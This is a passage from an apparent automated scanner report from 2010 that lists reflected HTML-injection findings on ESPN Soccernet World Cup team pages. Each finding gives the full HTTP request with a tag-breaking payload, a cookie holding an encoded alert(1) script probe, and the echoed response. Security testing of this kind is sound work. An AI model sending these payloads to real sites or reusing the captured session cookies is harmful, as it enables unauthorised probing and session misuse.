GET /worldcup2010/team/_/team/212/uruguay?2f178"><a>aa580cad459=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:48 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:48 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Cache-Expires: Sat, 06 Nov 2010 23:33:48 GMT Content-Length: 82091 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Uruguay Football / ...[SNIP]... <a href="/worldcup2010/team?team=212&2f178"><a>aa580cad459=1&_slug_=uruguay&2f178"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fd53"><a>9d87ae988a2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/215/honduras2fd53"><a>9d87ae988a2 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:37 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:37 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN16 Cache-Expires: Sat, 06 Nov 2010 23:14:37 GMT Content-Length: 81718 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Honduras Football / ...[SNIP]... <a href="/worldcup2010/team?team=215&_slug_=honduras2fd53"><a>9d87ae988a2&topId=802308&linktext=Coach+happy+after+claiming+point"> ...[SNIP]...
2.66. http://soccernet.espn.go.com/worldcup2010/team/_/team/215/honduras [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/215/honduras
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 914aa"><a>4f86e09379e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/215/honduras?914aa"><a>4f86e09379e=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:25 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN11 Cache-Expires: Sat, 06 Nov 2010 23:13:25 GMT Content-Length: 81826 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Honduras Football / ...[SNIP]... <a href="/worldcup2010/team?team=215&914aa"><a>4f86e09379e=1&_slug_=honduras&914aa"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17070"><a>7043290c14 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/2666/new-zealand17070"><a>7043290c14 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:26:01 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:26:01 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN17 Cache-Expires: Sat, 06 Nov 2010 23:31:01 GMT Content-Length: 82091 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>New Zealand Footbal ...[SNIP]... <a href="/worldcup2010/team?team=2666&_slug_=new-zealand17070"><a>7043290c14&topId=801589&linktext=Coach+delighted+with+unbeaten+run"> ...[SNIP]...
2.68. http://soccernet.espn.go.com/worldcup2010/team/_/team/2666/new-zealand [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/2666/new-zealand
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fb3e"><a>31ef275d77e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/2666/new-zealand?6fb3e"><a>31ef275d77e=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:22:18 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:22:18 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN33 Cache-Expires: Sat, 06 Nov 2010 23:27:18 GMT Content-Length: 82203 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>New Zealand Footbal ...[SNIP]... <a href="/worldcup2010/team?team=2666&6fb3e"><a>31ef275d77e=1&_slug_=new-zealand&6fb3e"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b56f"><a>36f0e92eb87 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4469/ghana3b56f"><a>36f0e92eb87 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:10:00 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:10:00 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN01 Cache-Expires: Sat, 06 Nov 2010 23:15:00 GMT Content-Length: 81725 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ghana Football / So ...[SNIP]... <a href="/worldcup2010/team?team=4469&_slug_=ghana3b56f"><a>36f0e92eb87&topId=805277&linktext=Ghana+crushed%2C+Uruguay+through"> ...[SNIP]...
2.70. http://soccernet.espn.go.com/worldcup2010/team/_/team/4469/ghana [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/4469/ghana
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aea54"><a>47a90bab802 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4469/ghana?aea54"><a>47a90bab802=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:43 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:43 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN11 Cache-Expires: Sat, 06 Nov 2010 23:13:42 GMT Content-Length: 81833 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ghana Football / So ...[SNIP]... <a href="/worldcup2010/team?team=4469&aea54"><a>47a90bab802=1&_slug_=ghana&aea54"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 139f9"><a>a59e25551c6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/448/england139f9"><a>a59e25551c6 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:11 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:11 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN21 Cache-Expires: Sat, 06 Nov 2010 23:14:10 GMT Content-Length: 80274 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>England Football / ...[SNIP]... <a href="/worldcup2010/team?team=448&_slug_=england139f9"><a>a59e25551c6&topId=805083&linktext=FA+confirms+Capello+will+stay+on"> ...[SNIP]...
2.72. http://soccernet.espn.go.com/worldcup2010/team/_/team/448/england [name of an arbitrarily supplied request parameter]previousnext
Summary
